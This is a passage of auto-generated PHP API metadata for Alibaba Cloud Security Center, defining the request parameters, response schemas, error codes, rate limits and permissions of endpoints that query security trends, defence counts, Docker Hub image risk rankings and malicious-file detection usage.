'description' => 'The list of statistical date strings for the trend data.', 'type' => 'array', 'items' => ['description' => 'The statistical date string for the trend data.'."\n" ."\n" .'> Format: yyyy-MM-dd HH:mm:ss.', 'type' => 'string', 'example' => '2024-01-01 00:00:00', 'title' => ''], 'title' => '', 'example' => '', ], 'ItemList' => [ 'description' => 'The list of returned data.', 'type' => 'array', 'items' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'KeyName' => ['description' => 'The type of security data. Valid values:'."\n" .'- **HC_NEW**: number of new baseline risks'."\n" .'- **HC_OPERATE**: number of handled baseline risks'."\n" .'- **VUL_NEW**: number of new vulnerability risks'."\n" .'- **VUL_OPERATE**: number of handled vulnerability risks'."\n" .'- **SUSP_NEW**: number of new alert risks'."\n" .'- **SUSP_OPERATE**: number of handled alert risks.', 'type' => 'string', 'example' => 'HC_NEW', 'title' => ''], 'CountList' => [ 'description' => 'The list of statistical values for the trend data.', 'type' => 'array', 'items' => ['description' => 'The statistical value for the trend data.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '1383B0DB-D5D6-4B0C-9E6B-75939C8E****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query security operations trends', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetDataTrend'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetDataTrend', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"DateList\\": [\\n 1721404800\\n ],\\n \\"DateStrList\\": [\\n \\"2024-01-01 00:00:00\\"\\n ],\\n \\"ItemList\\": [\\n {\\n \\"KeyName\\": \\"HC_NEW\\",\\n \\"CountList\\": [\\n 10\\n ]\\n }\\n ]\\n },\\n \\"RequestId\\": \\"1383B0DB-D5D6-4B0C-9E6B-75939C8E****\\"\\n}","type":"json"}]', ], 'GetDefenceCount' => [ 'summary' => 'Queries the number of alerting events handled by accurate access control and web tamper-proofing.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92295', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'DefenceCountTotal' => ['description' => 'The total number of alerts handled by accurate access control.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TamperProof15Days' => ['description' => 'The number of alerting events handled by web tamper-proofing in the last 15 days.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'DefenceCount15Days' => ['description' => 'The number of alerts handled by accurate access control in the last 15 days.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TamperProofTotal' => ['description' => 'The total number of alerting events handled by web tamper-proofing.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '89AD16CC-97EE-50F3-9B12-9E28E5C8****', 'title' => ''], 'SuspiciousDealtCount' => ['description' => 'The number of security alerts that have been handled in Security Center.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query security protection statistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetDefenceCount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:GetDefenceCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"DefenceCountTotal\\": 1,\\n \\"TamperProof15Days\\": 2,\\n \\"DefenceCount15Days\\": 1,\\n \\"TamperProofTotal\\": 1,\\n \\"RequestId\\": \\"89AD16CC-97EE-50F3-9B12-9E28E5C8****\\",\\n \\"SuspiciousDealtCount\\": 3\\n}","type":"json"}]', ], 'GetDockerhubImageRiskRankInfo' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Types', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The image dimension types to query.', 'type' => 'array', 'items' => ['description' => 'The image dimension types to query. Valid values:'."\n" .'- **vulAsap**: vulnerability scan statistics.'."\n" .'- **baseline**: baseline check scan statistics.', 'type' => 'string', 'required' => false, 'example' => 'baseline', 'title' => ''], 'required' => false, 'maxItems' => 5, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '30CBF632-109F-596F-97F2-451C8B2A****', 'title' => ''], 'RiskRankInfo' => [ 'description' => 'The risk information.', 'type' => 'object', 'properties' => [ 'VulAsap' => [ 'description' => 'The risk information about high-priority vulnerabilities.', 'type' => 'array', 'items' => [ 'description' => 'The risk information about high-priority vulnerabilities.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The unique identifier of the record.', 'type' => 'string', 'example' => '6636c286-8063-4c97-8508-6aaf16a8****', 'title' => ''], 'ImageSize' => ['description' => 'The image size.', 'type' => 'integer', 'format' => 'int64', 'example' => '1024', 'title' => ''], 'Digest' => ['description' => 'The digest value of the image.', 'type' => 'string', 'example' => 'd97c1348e56eb52902888e6e5673623321b1f19ac45ed532c3114dc0f989****', 'title' => ''], 'HcCount' => ['description' => 'The number of risks in the image repository.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Tag' => ['description' => 'The tag of the image.', 'type' => 'string', 'example' => 'app:app01-ubuntu', 'title' => ''], 'VulCount' => ['description' => 'The number of vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ImageId' => ['description' => 'The image ID.', 'type' => 'string', 'example' => 'fabe4203a89765a2c99554040bda51eac7885a18216f4ac0be82710cff60****', 'title' => ''], 'RepoName' => ['description' => 'The name of the image repository.', 'type' => 'string', 'example' => 'lkl-zf-ss-ordapi-labs', 'title' => ''], 'RepoNamespace' => ['description' => 'The namespace of the image repository.', 'type' => 'string', 'example' => 'namespace-01', 'title' => ''], 'RiskLevelDetail' => ['description' => 'The risk statistics information for all hosts, images, and containers.', 'type' => 'string', 'example' => '{\\"account\\":0,\\"agentlessAll\\":0,\\"agentlessBaseline\\":0,\\"agentlessMalicious\\":0,\\"agentlessSensitiveFile\\":0,\\"agentlessVulCve\\":0,\\"agentlessVulSca\\":0,\\"agentlessVulSys\\":0,\\"appNum\\":0,\\"asapVulCount\\":0,\\"baselineHigh\\":0,\\"baselineLow\\":0,\\"baselineMedium\\":0,\\"baselineNum\\":0,\\"cmsNum\\":0,\\"containerAsap\\":0,\\"containerLater\\":0,\\"containerNntf\\":0,\\"containerRemind\\":0,\\"containerSerious\\":0,\\"containerSuspicious\\":0,\\"cveNum\\":513,\\"emgNum\\":0,\\"health\\":0,\\"imageBaselineHigh\\":0,\\"imageBaselineLow\\":0,\\"imageBaselineMedium\\":0,\\"imageBaselineNum\\":0,\\"imageMaliciousFileRemind\\":0,\\"imageMaliciousFileSerious\\":0,\\"imageMaliciousFileSuspicious\\":0,\\"imageVulAsap\\":3,\\"imageVulLater\\":182,\\"imageVulNntf\\":328,\\"laterVulCount\\":0,\\"newSuspicious\\":0,\\"nntfVulCount\\":0,\\"remindNum\\":0,\\"scaNum\\":0,\\"seriousNum\\":0,\\"suspNum\\":0,\\"suspicious\\":0,\\"sysNum\\":0,\\"trojan\\":0,\\"uuid\\":\\"44ffb29d6f66d8509598bcdfa660a21d\\",\\"vul\\":513,\\"weakPWNum\\":0}', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Baseline' => [ 'description' => 'The baseline risk information.', 'type' => 'array', 'items' => [ 'description' => 'The baseline risk information struct.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The unique identifier of the record.', 'type' => 'string', 'example' => '5583aa03-922e-4709-a888-389f2489****', 'title' => ''], 'ImageSize' => ['description' => 'The image size.', 'type' => 'integer', 'format' => 'int64', 'example' => '1024', 'title' => ''], 'Digest' => ['description' => 'The digest value of the image.', 'type' => 'string', 'example' => 'f28ecca63bfaf22ead4b28b63d752a21e4d2c1de90b8549fbde880d619f3****', 'title' => ''], 'HcCount' => ['description' => 'The number of baseline risks in the image repository.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Tag' => ['description' => 'The image tag.', 'type' => 'string', 'example' => 'machineResource', 'title' => ''], 'VulCount' => ['description' => 'The number of detected vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ImageId' => ['description' => 'The ID of the image.', 'type' => 'string', 'example' => '7c5ad02865aef575387a05bb3c81b27e0d8ed1f2e3f722ea05523b72882f****', 'title' => ''], 'RepoName' => ['description' => 'The name of the container image repository.', 'type' => 'string', 'example' => 'glz123', 'title' => ''], 'RepoNamespace' => ['description' => 'The repository namespace.', 'type' => 'string', 'example' => 'namespace-01'."\n", 'title' => ''], 'RiskLevelDetail' => ['description' => 'The risk statistics information for all hosts, images, and containers.', 'type' => 'string', 'example' => '{\\"account\\":0,\\"agentlessAll\\":0,\\"agentlessBaseline\\":0,\\"agentlessMalicious\\":0,\\"agentlessSensitiveFile\\":0,\\"agentlessVulCve\\":0,\\"agentlessVulSca\\":0,\\"agentlessVulSys\\":0,\\"appNum\\":0,\\"asapVulCount\\":0,\\"baselineHigh\\":0,\\"baselineLow\\":0,\\"baselineMedium\\":0,\\"baselineNum\\":0,\\"cmsNum\\":0,\\"containerAsap\\":0,\\"containerLater\\":0,\\"containerNntf\\":0,\\"containerRemind\\":0,\\"containerSerious\\":0,\\"containerSuspicious\\":0,\\"cveNum\\":0,\\"emgNum\\":0,\\"health\\":0,\\"imageBaselineHigh\\":1,\\"imageBaselineLow\\":0,\\"imageBaselineMedium\\":0,\\"imageBaselineNum\\":1,\\"imageMaliciousFileRemind\\":0,\\"imageMaliciousFileSerious\\":0,\\"imageMaliciousFileSuspicious\\":0,\\"imageVulAsap\\":0,\\"imageVulLater\\":0,\\"imageVulNntf\\":0,\\"laterVulCount\\":0,\\"newSuspicious\\":0,\\"nntfVulCount\\":0,\\"remindNum\\":0,\\"scaNum\\":0,\\"seriousNum\\":0,\\"suspNum\\":0,\\"suspicious\\":0,\\"sysNum\\":0,\\"trojan\\":0,\\"uuid\\":\\"009635bf00c0585e3122ab92f5449919\\",\\"vul\\":0,\\"weakPWNum\\":0}', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query image rankings by dimension', 'summary' => 'Queries the rankings of images by various dimensions.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetDockerhubImageRiskRankInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetDockerhubImageRiskRankInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"30CBF632-109F-596F-97F2-451C8B2A****\\",\\n \\"RiskRankInfo\\": {\\n \\"VulAsap\\": [\\n {\\n \\"Uuid\\": \\"6636c286-8063-4c97-8508-6aaf16a8****\\",\\n \\"ImageSize\\": 1024,\\n \\"Digest\\": \\"d97c1348e56eb52902888e6e5673623321b1f19ac45ed532c3114dc0f989****\\",\\n \\"HcCount\\": 0,\\n \\"Tag\\": \\"app:app01-ubuntu\\",\\n \\"VulCount\\": 1,\\n \\"ImageId\\": \\"fabe4203a89765a2c99554040bda51eac7885a18216f4ac0be82710cff60****\\",\\n \\"RepoName\\": \\"lkl-zf-ss-ordapi-labs\\",\\n \\"RepoNamespace\\": \\"namespace-01\\",\\n \\"RiskLevelDetail\\": \\"{\\\\\\\\\\\\\\"account\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessAll\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessBaseline\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessMalicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessSensitiveFile\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessVulCve\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessVulSca\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessVulSys\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"appNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"asapVulCount\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"baselineHigh\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"baselineLow\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"baselineMedium\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"baselineNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"cmsNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerAsap\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerLater\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerNntf\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerRemind\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerSerious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerSuspicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"cveNum\\\\\\\\\\\\\\":513,\\\\\\\\\\\\\\"emgNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"health\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageBaselineHigh\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageBaselineLow\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageBaselineMedium\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageBaselineNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageMaliciousFileRemind\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageMaliciousFileSerious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageMaliciousFileSuspicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageVulAsap\\\\\\\\\\\\\\":3,\\\\\\\\\\\\\\"imageVulLater\\\\\\\\\\\\\\":182,\\\\\\\\\\\\\\"imageVulNntf\\\\\\\\\\\\\\":328,\\\\\\\\\\\\\\"laterVulCount\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"newSuspicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"nntfVulCount\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"remindNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"scaNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"seriousNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"suspNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"suspicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"sysNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"trojan\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"uuid\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"44ffb29d6f66d8509598bcdfa660a21d\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"vul\\\\\\\\\\\\\\":513,\\\\\\\\\\\\\\"weakPWNum\\\\\\\\\\\\\\":0}\\"\\n }\\n ],\\n \\"Baseline\\": [\\n {\\n \\"Uuid\\": \\"5583aa03-922e-4709-a888-389f2489****\\",\\n \\"ImageSize\\": 1024,\\n \\"Digest\\": \\"f28ecca63bfaf22ead4b28b63d752a21e4d2c1de90b8549fbde880d619f3****\\",\\n \\"HcCount\\": 1,\\n \\"Tag\\": \\"machineResource\\",\\n \\"VulCount\\": 1,\\n \\"ImageId\\": \\"7c5ad02865aef575387a05bb3c81b27e0d8ed1f2e3f722ea05523b72882f****\\",\\n \\"RepoName\\": \\"glz123\\",\\n \\"RepoNamespace\\": \\"namespace-01\\\\n\\",\\n \\"RiskLevelDetail\\": \\"{\\\\\\\\\\\\\\"account\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessAll\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessBaseline\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessMalicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessSensitiveFile\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessVulCve\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessVulSca\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessVulSys\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"appNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"asapVulCount\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"baselineHigh\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"baselineLow\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"baselineMedium\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"baselineNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"cmsNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerAsap\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerLater\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerNntf\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerRemind\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerSerious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerSuspicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"cveNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"emgNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"health\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageBaselineHigh\\\\\\\\\\\\\\":1,\\\\\\\\\\\\\\"imageBaselineLow\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageBaselineMedium\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageBaselineNum\\\\\\\\\\\\\\":1,\\\\\\\\\\\\\\"imageMaliciousFileRemind\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageMaliciousFileSerious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageMaliciousFileSuspicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageVulAsap\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageVulLater\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageVulNntf\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"laterVulCount\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"newSuspicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"nntfVulCount\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"remindNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"scaNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"seriousNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"suspNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"suspicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"sysNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"trojan\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"uuid\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"009635bf00c0585e3122ab92f5449919\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"vul\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"weakPWNum\\\\\\\\\\\\\\":0}\\"\\n }\\n ]\\n }\\n}","type":"json"}]', ], 'GetDockerhubImageRiskStatistic' => [ 'summary' => 'Queries the risk statistics of Docker Hub images.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Types', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The risk types that you want to query.'."\n", 'type' => 'array', 'items' => ['description' => 'The image dimension at which you want to query risk statistics. Valid values:'."\n" ."\n" .'* **totalScanned**: Query risk statistics based on the number of scanned Docker Hub images.'."\n" .'* **vulAsap**: Query risk statistics based on the number of high-risk vulnerabilities.'."\n" .'* **baseline**: Query risk statistics based on the number of baselines.'."\n", 'type' => 'string', 'required' => false, 'example' => 'totalScanned', 'title' => ''], 'required' => false, 'maxItems' => 5, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DD****', 'title' => ''], 'RiskRankInfo' => [ 'description' => 'The information about the risk source.'."\n", 'type' => 'object', 'properties' => [ 'ScanTime' => ['description' => 'The timestamp when the scan was performed.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1693997625000', 'title' => ''], 'ScanTimeTimestamp' => ['description' => 'The timestamp when the scan was performed.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1693997625000', 'title' => ''], 'VulAsap' => ['description' => 'The number of high-risk vulnerabilities.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Baseline' => ['description' => 'The number of baseline risks.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TotalScanned' => ['description' => 'The number of scanned Docker Hub images.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DD****\\",\\n \\"RiskRankInfo\\": {\\n \\"ScanTime\\": 1693997625000,\\n \\"ScanTimeTimestamp\\": 1693997625000,\\n \\"VulAsap\\": 1,\\n \\"Baseline\\": 1,\\n \\"TotalScanned\\": 1\\n }\\n}","type":"json"}]', 'title' => 'GetDockerhubImageRiskStatistic', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetDockerhubImageRiskStatistic'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetDockerhubImageRiskStatistic', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetFileDetectApiInvokeInfo' => [ 'summary' => 'Obtains the usage information of the malicious file detection SDK.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasNPORLE'], ], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => '', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => '9f368b6e-d60a-43c5-bd6f-c7087f2d****'], 'Data' => [ 'description' => 'Returns the response body.', 'type' => 'object', 'properties' => [ 'AuthCount' => ['description' => 'The total number of authorizations.', 'type' => 'integer', 'format' => 'int64', 'example' => '10000', 'title' => ''], 'RemainAuthCount' => ['description' => 'The number of remaining authorizations.', 'type' => 'integer', 'format' => 'int64', 'example' => '900', 'title' => ''], 'FlowRate' => ['description' => 'The frequency of calls.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TimeUnit' => ['description' => 'The time unit of the frequency limit. Value:'."\n" ."\n" .'* **SECONDS**'."\n" .'* **MINUTES**', 'type' => 'string', 'example' => 'SECONDS', 'title' => ''], 'Expire' => ['description' => 'The timestamp of the expiration date of the authorization number.', 'type' => 'integer', 'format' => 'int64', 'example' => '1815753600000', 'title' => ''], 'SaleVersion' => ['description' => 'The Authorized Version. Valid values include:'."\n" ."\n" .'* **1:** trial version'."\n" .'* **2:** Enterprise Edition', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'InvokeCount' => ['description' => 'The number of authorizations used.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], 'InvokeCountInSaleVersion' => ['description' => 'The number of authorizations used(excluding trials).', 'type' => 'integer', 'format' => 'int64', 'example' => '20', 'title' => ''], 'AuthCountInSaleVersion' => ['description' => 'The total number of authorizations(excluding trials).', 'type' => 'integer', 'format' => 'int64', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"9f368b6e-d60a-43c5-bd6f-c7087f2d****\\",\\n \\"Data\\": {\\n \\"AuthCount\\": 10000,\\n \\"RemainAuthCount\\": 900,\\n \\"FlowRate\\": 20,\\n \\"TimeUnit\\": \\"SECONDS\\",\\n \\"Expire\\": 1815753600000,\\n \\"SaleVersion\\": 2,\\n \\"InvokeCount\\": 10,\\n \\"InvokeCountInSaleVersion\\": 20,\\n \\"AuthCountInSaleVersion\\": 20\\n }\\n}","type":"json"}]', 'title' => 'GetFileDetectApiInvokeInfo', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFileDetectApiInvokeInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetFileDetectApiInvokeInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetFileDetectReport' => [ 'summary' => 'Queries the cloud sandbox check results of malicious files.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasNPORLE'], ], 'parameters' => [ [ 'name' => 'Field', 'in' => 'query', 'schema' => ['description' => 'The field that you want to query. You can enter multiple fields and separate them with commas (,).'."\n" ."\n" .'Valid values:'."\n" ."\n" .'- **ThreatTypes**: the type of the threat intelligence event'."\n" ."\n" .'- **Intelligences**: the threat intelligence 